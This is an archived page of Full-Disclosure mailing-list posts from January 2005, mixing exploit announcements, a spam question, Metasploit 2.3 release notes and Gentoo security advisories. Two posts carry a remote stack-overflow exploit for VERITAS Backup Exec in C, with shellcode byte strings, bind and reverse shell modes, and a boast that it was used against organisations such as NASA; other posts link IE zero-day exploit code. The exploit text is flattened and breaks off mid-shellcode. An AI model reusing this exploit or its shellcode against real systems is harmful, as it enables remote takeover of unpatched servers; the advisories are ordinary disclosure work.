RE: [Full-Disclosure] UPDATED: the insider exploit( = the latest ie 0day which involves SHOWMODALDIALOG)

2005-01-11 Thread Rafel Ivgi, The-Insider 
I forgot to tell everyone that i made an aspx version of jelmers exploit.

So lets sum it up, all the exploits to 0-day --> "The-Insider-Prototype"(as
defined by Liu) are:
1) JSP VERSION BY JELMER -
http://www.k-otik.com/exploits/07072004.IEApplicationShell.php
2) PHP VERSION BY Liu Die Yu- http://0daymon.org/monitor/insider/dir.zip
3) ASPX VERSION BY Rafel
ivgi -http://theinsider.deep-ice.com/The-Insider.zip


Greetings: Liu Die Yu, Drew Copley, Malware

Rafel Ivgi, The-Insider
Security Consultant

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: AV security contacts

2005-01-11 Thread juha-matti . laurio 
There is Open Source Vulnerability Database (OSVDB) Vendor Dictionary
available at
http://www.osvdb.org/vendor_dict.php

Common e-mail address and/or security contact is available in that list,
for example http://www.osvdb.org/vendor_dict.php?section=vendor&id=1229&c=S  
(Symantec).

Additionally, Secunia has their Products => Software section page 
available,
http://secunia.com/product/#software

for example http://secunia.com/product/164/  (Sophos).
You can select 'Vendor' link to visit vendor's home page.
Look at 'Contact Us' etc.

However, you waited for reply to your question only three hours.
Check those lists and send your analysis to them.


Regards,
Juha-Matti
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Interesting but suspicious possible phishing mail

2005-01-11 Thread DAN MORRILL 
Hi folks,
Got this really interesting mail in my box today, and knowing that I haven't 
used that e-mail address or ordered anything on line lately. Wondering if it 
might not be a phishing e-mail. Haven't seen anything like this before. 
Anyone see anything similar?
r/
Dan


from :  Gabrielle U. Philips, Jr <[EMAIL PROTECTED]>
Sent :  Monday, January 10, 2005 10:40 PM
To :  "Gabrielle U. Philips, Jr" <[EMAIL PROTECTED]>
CC :  [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], 
[EMAIL PROTECTED], [EMAIL PROTECTED]
Subject :  Shipping Notification, Tracking Number : TCD461649887242ESB

MIME-Version: 1.0
Received: from msnmail2.uswest.net ([63.226.138.22]) by mc10-f38.hotmail.com 
with Microsoft SMTPSVC(6.0.3790.211); Mon, 10 Jan 2005 14:45:54 -0800
Received: (qmail 72801 invoked by uid 0); 10 Jan 2005 22:45:55 -
Received: from unknown (63.226.138.18) by msnmail2.uswest.net with QMQP; 10 
Jan 2005 22:45:55 -
Received: (qmail 56089 invoked by uid 0); 10 Jan 2005 22:45:55 -
Received: from 42-171-64.adsl.cust.tie.cl (200.42.171.64) by 
mpls-cmx-12.inet.qwest.net with SMTP; 10 Jan 2005 22:45:42 -
X-Message-Info: JGTYoYF78jHm2Kmrh/becsOSGajhcE+aqhdcaXLDOFI=
Delivered-To: [EMAIL PROTECTED]
X-DCC-Qwest.net-Metrics: mpls-cmx-12.inet.qwest.net 1210; Body=4 
Fuz1=4Fuz2=4
Return-Path: [EMAIL PROTECTED]
X-OriginalArrivalTime: 10 Jan 2005 22:45:54.0814 (UTC) 
FILETIME=[24BA71E0:01C4F766]


Content-Type: multipart/mixed; 
boundary="-mpls-cmx-12.inet.qwest.net-1105397155-56110"

Content-Type: text/plain
This email was forwarded from your previous Qwest.net email address
to your MSN email address.  To discontinue email forwarding for any
future emails sent to your previous Qwest.net email address, please
contact MSN Customer Service.


Content-Type: message/rfc822
Content-Description: forwarded message
Content-Transfer-Encoding: 8bit
Content-Disposition: inline
From: Gabrielle U. Philips, Jr <[EMAIL PROTECTED]>
To: "Gabrielle U. Philips, Jr" <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], 
[EMAIL PROTECTED]
Subject: Shipping Notification, Tracking Number : TCD461649887242ESB
Sent: Monday, January 10, 2005 10:40 PM
MIME-Version: 1.0
Received: (qmail 56089 invoked by uid 0); 10 Jan 2005 22:45:55 -
Received: from 42-171-64.adsl.cust.tie.cl (200.42.171.64) by 
mpls-cmx-12.inet.qwest.net with SMTP; 10 Jan 2005 22:45:42 -
X-DCC-Qwest.net-Metrics: mpls-cmx-12.inet.qwest.net 1210; Body=4 
Fuz1=4Fuz2=4 Content-Type: multipart/alternative; 
boundary="--Part_GRKDac7J6.oMXawOLoYO4"

Content-Type: text/html; format=flowed; charset=iso-8859-15
Content-Transfer-Encoding: quoted-printable
Check your status Below:
cov2pa.com/track.asp?cg=1&c=tc
The illiterate of the 21st century will not be those who cannot read and 
write, but those who cannot learn, unlearn, and relearn. Alvin Toffler
Those police officers are practicing driving between the two buildings.
The illiterate of the 21st century will not be those who cannot read and 
write, but those who cannot learn, unlearn, and relearn. Alvin Toffler
Haven't the photographers already disliked praying?
Few things are harder to put up with than the annoyance of a good example.
3
When people are free to do as they please, they usually imitate each other. 
-Eric Hoffer (1902-1983)
Have you already loved sleeping?




Sometimes MSN E-mail will indicate that the mesasge failed to be delivered. 
Please resend when you get those, it does not mean that the mail box is bad, 
merely that MSN mail is over worked at the time.

_
Don’t just search. Find. Check out the new MSN Search! 
http://search.msn.click-url.com/go/onm00200636ave/direct/01/

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] full-disclosure@lists.netsys.com

2005-01-11 Thread Nicolas Waisman 
Libdisassemble is not a disassembler, just a lib. The simple disassemble it is 
just an example of how easy is to use it (it's a two-line assembler that shows 
how to incorporate it's opcode dissassembly. hence the term 'lib..dissassembly')

Nico
Immunity, Inc


> my mistake...

>short jump:
>it's JMP_Address + 2 + Second_Byte_value = Next_Instruction_Address

>shadown at twister:~/tmp$ echo -n -e "\x75\x65" > a
>shadown at twister:~/tmp$ ndisasm -b32 a
>  7565  jnz 0x67
>shadown at twister:~/tmp$ ~/instalar/libdisassemble/disassemble.py a 0x0 0xff
>Disassembling file a at offset: 0x0
> :   jnz   0x65

>this is where my mistake came from ;)
>thnx
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Interesting but suspicious possible phishing mail

2005-01-11 Thread Vincent Archer 
On Tue, Jan 11, 2005 at 02:27:55AM +, DAN MORRILL wrote:
> Got this really interesting mail in my box today, and knowing that I 
> haven't used that e-mail address or ordered anything on line lately. 
> Wondering if it might not be a phishing e-mail. Haven't seen anything like 
> this before. Anyone see anything similar?

No, not phishing. Just the usual spam for on-line meds.

Major hints: spurious text destined to foil bayesian spam filters, subject
targeted to get you to open the mail ("what? I didn't order anything!").

-- 
Vincent ARCHER
[EMAIL PROTECTED]

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 5, rue Scribe - 75009 Paris - France
www.denyall.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Linux kernel uselib() privilege elevation, corrected

2005-01-11 Thread Marcy Darcy 
I'm running a small server with the 2.6.10 kernel.

The exploit doesen't seem to be working on this kernel. Is there a way
to make sure the sistem is vulnerable or not?

#uname -a 
Linux test 2.6.10 #1 SMP Mon Jan 3 10:20:00 i686 Intel(R) Pentium(R) 4
CPU 3.00GHz GenuineIntel GNU/Linux
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Security Contact for Nokia Mobile phone softwares

2005-01-11 Thread rohit 
Hi,
 Does anyone know of security contact for Nokia or symbian OS?
Specifically for models 6600 and 7610.
Please reply to me directly as I am not on the list.
Thanks
Rohit
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] UPDATED: the insider exploit( = the latest ie0day which involves SHOWMODALDIALOG)

2005-01-11 Thread Ferruh Mavituna 

4) Classic ASP version;
http://ferruh.mavituna.com/article/?553


Ferruh Mavituna
http://ferruh.mavituna.com
PGPKey: http://ferruh.mavituna.com/pgpkey.asc
 

> -Original Message-
> From: [EMAIL PROTECTED] 
> [mailto:[EMAIL PROTECTED] On Behalf 
> Of Rafel Ivgi, The-Insider
> Sent: Tuesday, January 11, 2005 10:37 AM
> To: bugtraq@securityfocus.com; 
> full-disclosure@lists.netsys.com; [EMAIL PROTECTED]
> Subject: RE: [Full-Disclosure] UPDATED: the insider exploit( 
> = the latest ie0day which involves SHOWMODALDIALOG)
> 
> I forgot to tell everyone that i made an aspx version of 
> jelmers exploit.
> 
> So lets sum it up, all the exploits to 0-day --> 
> "The-Insider-Prototype"(as defined by Liu) are:
> 1) JSP VERSION BY JELMER -
> http://www.k-otik.com/exploits/07072004.IEApplicationShell.php
> 2) PHP VERSION BY Liu Die Yu- 
> http://0daymon.org/monitor/insider/dir.zip
> 3) ASPX VERSION BY Rafel
> ivgi -http://theinsider.deep-ice.com/The-Insider.zip
> 
> 
> Greetings: Liu Die Yu, Drew Copley, Malware
> 
> Rafel Ivgi, The-Insider
> Security Consultant
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Metasploit Framework v2.3

2005-01-11 Thread H D Moore 
The Metasploit Framework is an advanced open-source exploit
development platform. The 2.3 release includes three user interfaces,
46 exploits and 68 payloads.

The Framework will run on any modern operating system that has a working
Perl interpreter. The Windows installer includes a slimmed-down version
of the Cygwin environment.

Some highlights in this release:

 - Complete overhaul of the Framework payload collection
+ Win32 ordinal-stagers are now included (92-byte reverse connect)
+ A handful of new sparc payloads have been added (sol, linux, bsd)
+ Reliability problems have been resolved in bsd, linux, and win32
+ New udp-based linux shell stagers and shell payloads
+ New size-optimized Mac OS X encoders and payloads

 - Includes the win32 version of the Meterpreter
+ Dynamically load new features over the network w/o disk access
+ In-memory dll injection of the basic meterpreter shell
+ Current extensions include Fs, Process, Net, and Sys
+ Extensive documentation is available online:
  * http://metasploit.com/projects/Framework/docs/meterpreter.pdf

 - Complete rewrite of the 'msfweb' user interface
+ Generate and encode stand-alone shellcode from the web interface
+ The interface is skinnable and includes three different themes
+ Streaming HTTP is used to provide a 100% web-based shell
+ Ability to set advanced options in the web interface

 - Massive speed enhancements in msfconsole and msfweb
+ Snappier response and quicker load times on older systems
+ Optimizations made to various sort/search algorithms
+ Modules are no longer reloaded after each exploit

 - New exploits
+ Microsoft WINS Service Memory Overwrite (MS04-045) 
+ Samba trans2open() Buffer Overflow (Mac OS X)
+ 4D WebSTAR FTP Server Buffer Overflow (Mac OS X)
+ Veritas Name Service Registration Buffer Overflow
+ AOL Instant Messenger 'goaway' Buffer Overflow
+ IPSwitch IMail IMAPD 'delete' Buffer Overflow
+ Seattle Labs Mail Server POP3 Buffer Overflow
+ UoW IMAPD Buffer Overflow (sparc, ia32)
+ IRIX lpdsched Remote Command Execution
+ CDE dtspcd Buffer Overflow (Solaris)
+ IIS 4.0 ism.dll HTR Buffer Overflow 
+ IIS w3who.dll ISAPI Buffer Overflow


This release is available from the Metasploit.com web site:
  - Unix:  http://metasploit.com/tools/framework-2.3.tar.gz
  - Win32: http://metasploit.com/tools/framework-2.3.exe

Screen shots of the new release are online and available from:
  - http://metasploit.com/projects/Framework/screenshots.html
  
A demonstration of the new msfweb interface is running live from:
  - http://metasploit.com:5/
  

Exploit modules designed for the 2.2 release should maintain
compatibility with 2.3. If you run into any problems using older
modules with this release, please let us know.

The Framework development team consists of four active members and a
handful of part-time contributors. Check out the 'Credits' exploit
module for a complete list of contributors.

You can subscribe to the Metasploit Framework mailing list by sending a
blank email to framework-subscribe[at]metasploit.com. This is the
preferred way to submit bugs, suggest new features, and discuss the
Framework with other users.

If you would like to contact us directly, please email us at:
msfdev[at]metasploit.com.

Starting with the 2.2 release, it is now possible to perform a system-wide
installation of the Framework. Simply extract the tarball into the
directory of your choice and create symbolic links from the msf*
executables to a directory in the system path. Users may maintain their
own exploit module collections by placing them into ~/.msf/exploits/. If
you are interested in adding the Framework to a operating system
distribution, please drop us a line and we will gladly help with the
integration and testing process.

For more information about the Framework and this release in general,
please refer to the online documentation, particularly the User Guide:
  - http://metasploit.com/projects/Framework/documentation.html


The Opcode Database has been refactored in order to support more granular
queries. The new version provides users with the ability to easily cross
reference specific opcode types, classes, and meta classes across one or
more modules for one or more operating system versions. This level of
granular control allows for a robust and flexible interface that can be
used to determine opcode portability. Aside from opcodes themselves, the
opcode database also contains detailed information about the segments,
imports, and exports that are associated with each module in the database.

A quick overview of the features included in the new database are:
  - Granular searching of opcodes of a specific type, class, and meta class.  
  - Searching modules provided directly from Windbg's module list. 
  - Cross referencing opcodes across various operating system version. 
  - Detailed module inform

[Full-Disclosure] VERITAS Backup Exec 8.x/9.x Remote Universal Exploit

2005-01-11 Thread class 101 



Because k-otik are poor looser not respecting the 
publication of metasploit 2.3 , im forced to post my code.
 
/*VERITAS Backup Exec 
v9.1.4691.SP1    
v9.1.4691.SP0 v8.5.3572Agent Browser 
Service, Remote Stack Overflow
 
Highly Critical
 
All credits to: 
 
-iDEFENSE(discovery-www.iDEFENSE.com), -Thor 
Doomen(iat-syscall[at]inbox.lv), -H.D. 
Moore(scode-www.metasploit.com),-Matt 
Miller(scode-www.hick.org)
 
ExtraNotes:
 
All my tests/debugs where a bit long (some days) 
firstly due to the big sizeof Backup Exec and the unstability accross 
differents windows versionsto make working that IAT method with 100% success 
and the difficulty to debug it.(As a recall, due to the 60 bytes only free, 
a tiny shellcode is send in first to scanthe recv function of benetns.exe 
and jump to the data submitted during the second send,thanx syscall. Let's 
think large now. Imagine that you exploits the hole and you submitthe 
shellcode 5 minutes later, the service will hang on to death of course until a 
kill,now imagine that you exploits the hole and you submit the shellcode too 
faslty for the,computer processing, the shellcode can be missed, wont be 
executed again, sometimes yes/no, but really unstable. Hopefully (or 
unfortunely for you admin :>) I'm here to optimize it and make it 100% 
working, universal,stable whatever you want for the good fortune of script 
kiddies and to show what mean working to my goodfriends ka-odick 
:> 
Tries   
Machine   Bind  / 
Rverse / Success
 
 (2x) Win2k SP4   Server 
English  
10    
10   20 (1x) Win2k SP4   
Pro    English   
5 
5   10 (1x) WinXP SP1   
Pro    English   
5 
5   10 (1x) WinXP SP1a  
Pro    English   
5 
5   10 (3x) Win2003 SP0 Server 
English   
5 
5   10 (1x) Win2003 SP0 Server 
Ita.  
5 
5   10 (1x) 
NT4 Server 
English.  
5 
5   10
 
= 
Universal
 
v0.1:C code based on Thor Doomen's code posted 
at the metasploit mailing list,excellent in the method, but super unstable 
to not say not working when used,made some changes.
 
v0.2:fix of the first big problem , the missed 
shellcode accross differents windows, fixed by flooding benetns with more 
sends, timer really small, this is important.padding 1 nop to the reverse 
shellcode as needed, else crash on reverse.
 
v0.3:universal esi call across v9.1 SP0 and 
SP1, for the good fortune of script kiddies.
 
v0.4:As a warning, this poc v0.4 as been tested 
working by an anonymous tester (never mentionned there)on some organisations 
such nasa, states/edus, it's urgent to update 1 month after the advisory, 
sleepers.
 
Tips: -make sure that your ip is safe of null bytes 
in reverse mode.  -make sure that you targets 
the good version of Backup Exec,  else you 
crash it.   -Backup Exec v10.0 is now available, get it at www.veritas.com.   -Visit 
dfind.kd-team.com for a patched benetns.exe, quick solution    for 
an urgent update. (extracted from the hotfix at www.veritas.com)  
Backup Exec 9.x is tested safe after replacing the .exe
 
Greetings:    Nima 
Majidi   Behrang Fouladi   Pejman   
keystr0ke   JGS   DiabloHorn   
kimatrix   NaV   New Metasploit v2.3 (http://www.metasploit.com/)   
and all idlers of #n3ws on Eris Free Network.
 
by class101 [at] hat-squad.comanswering to all 
stupid questions that I got & will have, no I'm not persian and you don't 
care where I come from.
 
04 January 2005*/#include 
#include #include 
#ifdef WIN32#include "winsock2.h"#pragma comment(lib, 
"ws2_32")#else#include #include 
#include #include 
#include #include 
#include #include 
#include #include 
#endif
 
char scode1[]=file://Matt Millers 'skape' shellcode."\x90"  // 
pad needed their for me, if you get scode detection problems on slow 
connections,file://try to add more NOP and make 
sure to update the memcpys later in the 
code."\xeb\x6e\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0d\x56\x8b\x40\x0c\x8b\x70\x1c\xad""\x8b\x40\x08\x5e\xc3\x8b\x40\x34\x83\xc0\x7c\x8b\x40\x3c\xc3\x60\x8b\x6c\x24\x24""\x8b\x45\x3c\x8b\x7c\x05\x78\x03\xfd\x8b\x4f\x18\x8b\x5f\x20\x03\xdd\xe3\x33\x49""\x8b\x34\x8b\x03\xf5\x33\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x03\xd0\xeb""\xf4\x3b\x54\x24\x28\x75\xe2\x8b\x5f\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5f\x1c\x03""\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa9\xff""\xff\xff\x89\x07\x83\xc4\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72""\xfe\xb3\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa\x60\xcb""\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff""\xff\x5e\xe8\x47\xff\xff\xff\x8b\xd0\x83\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10""\xe8\xa5\xff\xff\xff\x83\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f""\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8\x01\x63""\x6d\x64\x

[Full-Disclosure] [ GLSA 200501-16 ] Konqueror: Java sandbox vulnerabilities

2005-01-11 Thread Sune Kloppenborg Jeppesen 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200501-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Konqueror: Java sandbox vulnerabilities
  Date: January 11, 2005
  Bugs: #72750
ID: 200501-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


The Java sandbox environment in Konqueror can be bypassed to access
arbitrary packages, allowing untrusted Java applets to perform
unrestricted actions on the host system.

Background
==

KDE is a feature-rich graphical desktop environment for Linux and
Unix-like Operating Systems. Konqueror is the KDE web browser and file
manager.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  kde-base/kdelibs   < 3.3.2   >= 3.3.2

Description
===

Konqueror contains two errors that allow JavaScript scripts and Java
applets to have access to restricted Java classes.

Impact
==

A remote attacker could embed a malicious Java applet in a web page and
entice a victim to view it. This applet can then bypass security
restrictions and execute any command, or access any file with the
rights of the user running Konqueror.

Workaround
==

There is no known workaround at this time.

Resolution
==

All kdelibs users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose kde-base/kdelibs

Note: There is currently no fixed stable version for sparc.

References
==

  [ 1 ] KDE Security Advisory: Konqueror Java Vulnerability
http://www.kde.org/info/security/advisory-20041220-1.txt
  [ 2 ] CAN 2004-1145
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1145

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200501-16.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0


pgpMDLTFlO5mm.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] [ GLSA 200501-17 ] KPdf, KOffice: More vulnerabilities in included Xpdf

2005-01-11 Thread Sune Kloppenborg Jeppesen 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200501-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: KPdf, KOffice: More vulnerabilities in included Xpdf
  Date: January 11, 2005
  Bugs: #75203, #75204
ID: 200501-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


KPdf and KOffice both include vulnerable Xpdf code to handle PDF files,
making them vulnerable to the execution of arbitrary code if a user is
enticed to view a malicious PDF file.

Background
==

KPdf is a KDE-based PDF viewer included in the kdegraphics package.
KOffice is an integrated office suite for KDE.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  app-office/koffice   < 1.3.5-r1   >= 1.3.5-r1
  2  kde-base/kdegraphics < 3.3.2-r1   >= 3.3.2-r1
  *>= 3.2.3-r3
---
 2 affected packages on all of their supported architectures.
---

Description
===

KPdf and KOffice both include Xpdf code to handle PDF files. Xpdf is
vulnerable to multiple new integer overflows, as described in GLSA
200412-24.

Impact
==

An attacker could entice a user to open a specially-crafted PDF file,
potentially resulting in the execution of arbitrary code with the
rights of the user running the affected utility.

Workaround
==

There is no known workaround at this time.

Resolution
==

All KPdf users should upgrade to the latest version of kdegraphics:

# emerge --sync
# emerge --ask --oneshot --verbose kde-base/kdegraphics

Note: There is currently no fixed stable 3.3.x version for sparc.

All KOffice users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose app-office/koffice

References
==

  [ 1 ] GLSA 200412-24
http://www.gentoo.org/security/en/glsa/glsa-200412-24.xml
  [ 2 ] CAN-2004-1125
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1125
  [ 3 ] KDE Security Advisory: kpdf Buffer Overflow Vulnerability
http://kde.org/info/security/advisory-20041223-1.txt
  [ 4 ] KOffice XPDF Integer Overflow 2
http://koffice.kde.org/security/2004_xpdf_integer_overflow_2.php

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200501-17.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0


pgppLlGtvnVOx.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] VERITAS Backup Exec 8.x/9.x Remote UniversalExploit

2005-01-11 Thread class 101 



you can get my clean code there 
dfind.kd-team.com
Bye and good urgent patching ;)
-class101Hat-Squad.com-

  - Original Message - 
  From: 
  class 
  101 
  To: full-disclosure@lists.netsys.com ; 
  bugtraq@securityfocus.com 
  Sent: Tuesday, January 11, 2005 12:39 
  PM
  Subject: [Full-Disclosure] VERITAS Backup 
  Exec 8.x/9.x Remote UniversalExploit
  
  Because k-otik are poor looser not respecting the 
  publication of metasploit 2.3 , im forced to post my code.
   
  /*VERITAS Backup Exec 
  v9.1.4691.SP1    
  v9.1.4691.SP0 v8.5.3572Agent Browser 
  Service, Remote Stack Overflow
   
  Highly Critical
   
  All credits to: 
   
  -iDEFENSE(discovery-www.iDEFENSE.com), -Thor 
  Doomen(iat-syscall[at]inbox.lv), -H.D. 
  Moore(scode-www.metasploit.com),-Matt 
  Miller(scode-www.hick.org)
   
  ExtraNotes:
   
  All my tests/debugs where a bit long (some days) 
  firstly due to the big sizeof Backup Exec and the unstability accross 
  differents windows versionsto make working that IAT method with 100% 
  success and the difficulty to debug it.(As a recall, due to the 60 bytes 
  only free, a tiny shellcode is send in first to scanthe recv function of 
  benetns.exe and jump to the data submitted during the second send,thanx 
  syscall. Let's think large now. Imagine that you exploits the hole and you 
  submitthe shellcode 5 minutes later, the service will hang on to death of 
  course until a kill,now imagine that you exploits the hole and you submit 
  the shellcode too faslty for the,computer processing, the shellcode can be 
  missed, wont be executed again, sometimes yes/no, but really unstable. 
  Hopefully (or unfortunely for you admin :>) I'm here to optimize it and 
  make it 100% working, universal,stable whatever you want for the good 
  fortune of script kiddies and to show what mean working to my goodfriends 
  ka-odick 
  :> 
  Tries   
  Machine   Bind  
  / Rverse / Success
   
   (2x) Win2k SP4   Server 
  English  
  10    
  10   20 (1x) Win2k SP4   
  Pro    English   
  5 
  5   10 (1x) WinXP SP1   
  Pro    English   
  5 
  5   10 (1x) WinXP SP1a  
  Pro    English   
  5 
  5   10 (3x) Win2003 SP0 Server 
  English   
  5 
  5   10 (1x) Win2003 SP0 Server 
  Ita.  
  5 
  5   10 (1x) 
  NT4 Server 
  English.  
  5 
  5   10
   
  = 
  Universal
   
  v0.1:C code based on Thor Doomen's code 
  posted at the metasploit mailing list,excellent in the method, but super 
  unstable to not say not working when used,made some changes.
   
  v0.2:fix of the first big problem , the 
  missed shellcode accross differents windows, fixed by flooding benetns 
  with more sends, timer really small, this is important.padding 1 nop to 
  the reverse shellcode as needed, else crash on reverse.
   
  v0.3:universal esi call across v9.1 SP0 and 
  SP1, for the good fortune of script kiddies.
   
  v0.4:As a warning, this poc v0.4 as been 
  tested working by an anonymous tester (never mentionned there)on some 
  organisations such nasa, states/edus, it's urgent to update 1 month after the 
  advisory, sleepers.
   
  Tips: -make sure that your ip is safe of null 
  bytes in reverse mode.  -make sure that you 
  targets the good version of Backup Exec,  
  else you crash it.   -Backup Exec v10.0 is now available, get it 
  at www.veritas.com.   
  -Visit dfind.kd-team.com for a patched benetns.exe, quick solution 
     for an urgent update. (extracted from the hotfix at www.veritas.com)  
  Backup Exec 9.x is tested safe after replacing the .exe
   
  Greetings:    Nima 
  Majidi   Behrang Fouladi   Pejman   
  keystr0ke   JGS   DiabloHorn   
  kimatrix   NaV   New Metasploit v2.3 (http://www.metasploit.com/)   
  and all idlers of #n3ws on Eris Free Network.
   
  by class101 [at] hat-squad.comanswering to 
  all stupid questions that I got & will have, no I'm not persian and you 
  don't care where I come from.
   
  04 January 2005*/#include 
  #include #include 
  #ifdef WIN32#include "winsock2.h"#pragma 
  comment(lib, "ws2_32")#else#include #include 
  #include #include 
  #include #include 
  #include #include 
  #include #include 
  #endif
   
  char scode1[]=file://Matt Millers 'skape' shellcode."\x90"  
  // pad needed their for me, if you get scode detection problems on slow 
  connections,file://try to add more NOP and make 
  sure to update the memcpys later in the 
  code."\xeb\x6e\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0d\x56\x8b\x40\x0c\x8b\x70\x1c\xad""\x8b\x40\x08\x5e\xc3\x8b\x40\x34\x83\xc0\x7c\x8b\x40\x3c\xc3\x60\x8b\x6c\x24\x24""\x8b\x45\x3c\x8b\x7c\x05\x78\x03\xfd\x8b\x4f\x18\x8b\x5f\x20\x03\xdd\xe3\x33\x49""\x8b\x34\x8b\x03\xf5\x3

[Full-Disclosure] [ GLSA 200501-18 ] KDE FTP KIOslave: Command injection

2005-01-11 Thread Sune Kloppenborg Jeppesen 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200501-18
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: KDE FTP KIOslave: Command injection
  Date: January 11, 2005
  Bugs: #73759
ID: 200501-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


The FTP KIOslave contains a bug allowing users to execute arbitrary FTP
commands.

Background
==

KDE is a feature-rich graphical desktop environment for Linux and
Unix-like Operating Systems. KDE provided KIOslaves for many protocols
in the kdelibs package, one of them being FTP. These are used by KDE
applications such as Konqueror.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  kde-base/kdelibs < 3.3.2-r2   >= 3.3.2-r2
  *>= 3.2.3-r5

Description
===

The FTP KIOslave fails to properly parse URL-encoded newline
characters.

Impact
==

An attacker could exploit this to execute arbitrary FTP commands on the
server and due to similiarities between the FTP and the SMTP protocol,
this vulnerability also allows an attacker to connect to a SMTP server
and issue arbitrary commands, for example sending an email.

Workaround
==

There is no known workaround at this time.

Resolution
==

All kdelibs users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose kde-base/kdelibs

Note: There is currently no fixed stable 3.3.x version for sparc.

References
==

  [ 1 ] KDE Security Advisory: ftp kioslave command injection
http://www.kde.org/info/security/advisory-20050101-1.txt
  [ 2 ] CAN-2004-1165
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1165

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200501-18.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0


